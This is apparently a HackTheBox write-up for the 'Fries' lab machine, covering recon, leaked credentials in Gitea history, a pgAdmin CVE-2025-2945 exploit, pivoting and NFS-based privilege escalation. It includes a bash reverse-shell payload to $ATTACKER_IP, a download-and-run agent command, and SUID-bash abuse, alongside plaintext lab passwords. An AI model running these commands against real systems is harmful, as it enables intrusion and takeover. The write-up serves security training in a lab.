Fries - HackTheBox Writeup

Machine Information

  • Difficulty: Hard
  • Operating System: Windows Server 2022 (Domain Controller) + Ubuntu (Web Server)
  • Domain: fries.htb

Initial Setup

Hosts Configuration

Add the following entries to /etc/hosts:

echo "$TARGET_IP fries.htb DC01.fries.htb code.fries.htb db-mgmt05.fries.htb" | sudo tee -a /etc/hosts

Reconnaissance

Nmap Scan

Full port scan to identify open services:

sudo nmap -A -sC -sS -v -p- --min-rate=1000 $TARGET_IP -oN nmap_full.txt

Key Findings:

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH 8.9p1 Ubuntu
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.18.0 (Ubuntu)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
443/tcp   open  ssl/http      nginx 1.18.0 (Ubuntu)
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp  open  ssl/ldap
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp  open  mc-nmf        .NET Message Framing

Environment Details:

  • Domain: fries.htb
  • Domain Controller: DC01.fries.htb
  • Certificate Authority: fries-DC01-CA

Subdomain Enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
  -u http://$TARGET_IP \
  -H "Host: FUZZ.fries.htb" \
  -mc 200

Discovered Subdomains:

  • code.fries.htb - Gitea instance
  • db-mgmt05.fries.htb - pgAdmin interface
  • https://fries.htb - Password Management portal

Web Application Enumeration

Gitea Instance (code.fries.htb)

Accessing http://code.fries.htb reveals a Gitea repository hosting application code.

Key Intelligence from Repository:

  1. Flask application with PostgreSQL backend
  2. Database management interface at db-mgmt05.fries.htb
  3. Database name: ps_db
  4. Key personnel: Dylan, Mike, Dale (infrastructure access)
  5. Contact: [email protected]

Git History Analysis

Searching through Git history reveals sensitive credentials:

git clone http://code.fries.htb/fries/fries-app.git
cd fries-app
git log -p --all | grep -i "postgresql\|postgres\|database_url\|sqlalchemy" -B 5 -A 5

Credentials Found:

DATABASE_URL=postgresql://root:[email protected]:5432/ps_db
SECRET_KEY=[REDACTED]

pgAdmin Interface (db-mgmt05.fries.htb)

The subdomain hosts pgAdmin 9.1, which is vulnerable to CVE-2025-2945 (Remote Code Execution).

Login Credentials (from Gitea repository):

Username: [email protected]
Password: D4LE11maan!!

Exploitation - Initial Access

CVE-2025-2945 - pgAdmin RCE

# Clone exploit
git clone https://github.com/Cycloctane/cve-2025-2945-poc.git
cd cve-2025-2945-poc


#start nc
nc -lvnp 4444

# Execute exploit
python3 exp.py \
  --target-url http://db-mgmt05.fries.htb \
  --username [email protected] \
  --password 'D4LE11maan!!' \
  --db-user root \
  --db-pass 'PsqLR00tpaSS11' \
  --db-name ps_db \
  --payload "__import__('os').system('bash -c \"bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1\"')"

Result: Shell as pgadmin user inside Docker container

Post-Exploitation - Docker Container

Network Pivoting with Ligolo-ng

To access the internal Docker network and pivot further:

# Download Ligolo-ng
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

# Extract
tar -xzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar -xzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

# Start proxy
./proxy -selfcert -laddr 0.0.0.0:11601

On compromised container:

# Serve agent from attacker machine
python3 -m http.server 8000

# Download and execute agent on container
wget http://$ATTACKER_IP:8000/agent
chmod +x agent
./agent -connect $ATTACKER_IP:11601 -ignore-cert

Add routing:

# Route Docker network
sudo ip route add 172.18.0.0/24 dev ligolo

# Route internal network (discovered later)
sudo ip route add 192.168.100.0/24 dev ligolo

Container Enumeration

Running linpeas.sh reveals additional credentials:

[email protected]
PGADMIN_DEFAULT_PASSWORD=Friesf00Ds2025!!

Writable /etc/passwd (Docker container) and NFS mount discovered:

showmount -e 172.18.0.1
# Output: /srv/web.fries.htb *

NFS Mount Analysis

# Mount NFS share
sudo mkdir -p /mnt/nfs_fries
sudo mount -t nfs 172.18.0.1:/srv/web.fries.htb /mnt/nfs_fries
cd /mnt/nfs_fries

ls -la
# drw-r-xr-x 5  655 root     4096 May 28 12:17 .
# drwxr-xr-x 3 root root     4096 Nov 23 00:43 ..
# drwxrwx--- 2 root 59605603 4096 May 26 13:13 certs
# drwxrwxrwx 2 root root     4096 May 31 06:11 shared
# drwxr----- 5 user  user      4096 Jun  7 08:30 webroot

Network Discovery

Docker Network (172.18.0.0/24):

  • 172.18.0.1 - Docker Gateway/Host
  • 172.18.0.3 - PostgreSQL Database
  • 172.18.0.4 - pgAdmin (compromised)

Internal Network (192.168.100.0/24):

  • 192.168.100.1 - DC01 (Domain Controller)
  • 192.168.100.2 - WEB server
# DNS query from container
nslookup dc01.fries.htb
# Output: 192.168.100.1

Scanning Internal Network

nmap -sT -Pn 192.168.100.1-2 -p- --min-rate 1000

192.168.100.1 (DC01): Domain Controller services 192.168.100.2 (WEB): SSH, HTTP, HTTPS, NFS, RPC

Lateral Movement - Web Server Access

Password Spraying

Testing discovered credentials against SSH

Success: SSH access as svc user with password Friesf00Ds2025!!

ssh [email protected]

Privilege Escalation - NFS User Impersonation

The NFS share requires specific UID/GID permissions. We can exploit this by creating matching users on our attacking machine.

From WEB server (as svc):

# Copy bash binary to shared NFS folder
cp /bin/bash /srv/web.fries.htb/shared/target_bash

From attacker machine:

# Create matching groups and user
sudo groupadd -g 120 barman_group
sudo groupadd -g 59605603 infra_managers
sudo useradd -u 117 -g 59605603 -M -s /bin/bash barman_local

# Set SUID on bash with correct ownership
sudo su - barman_local -c "cp /mnt/nfs_fries/shared/target_bash /mnt/nfs_fries/shared/bash2"
sudo su - barman_local -c "chmod 6777 /mnt/nfs_fries/shared/bash2"

Back on WEB server:

# Execute SUID bash
./bash2 -p

# Verify escalated privileges
id
# uid=1000(svc) euid=117(barman) egid=59605603(infra managers)
#windows #linux #docker #exploit